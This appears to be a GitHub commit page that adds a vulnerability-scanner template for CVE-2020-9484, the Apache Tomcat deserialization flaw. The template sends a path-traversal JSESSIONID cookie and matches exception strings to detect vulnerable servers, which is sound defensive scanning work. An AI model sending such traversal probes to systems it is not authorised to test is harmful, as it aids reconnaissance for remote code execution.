We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
2 parents 3914856 + 5756349 commit d1eb7d3Copy full SHA for d1eb7d3
cves/CVE-2020-9484.yaml
@@ -0,0 +1,26 @@
1
+id: CVE-2020-9484
2
+
3
+info:
4
+ name: Apache Tomcat RCE by deserialization
5
+ author: dwisiswant0
6
+ severity: high
7
8
+requests:
9
+ - method: GET
10
+ headers:
11
+ Cookie: "JSESSIONID=../../../../../usr/local/tomcat/groovy"
12
+ path:
13
+ - "{{BaseURL}}/index.jsp"
14
+ - "{{BaseURL}}:8080/index.jsp"
15
+ matchers-condition: and
16
+ matchers:
17
+ - type: status
18
+ status:
19
+ - 500
20
+ - type: word
21
+ words:
22
+ - "Exception"
23
+ - "ObjectInputStream"
24
+ - "PersistentManagerBase"
25
+ condition: and
26
+ part: body
0 commit comments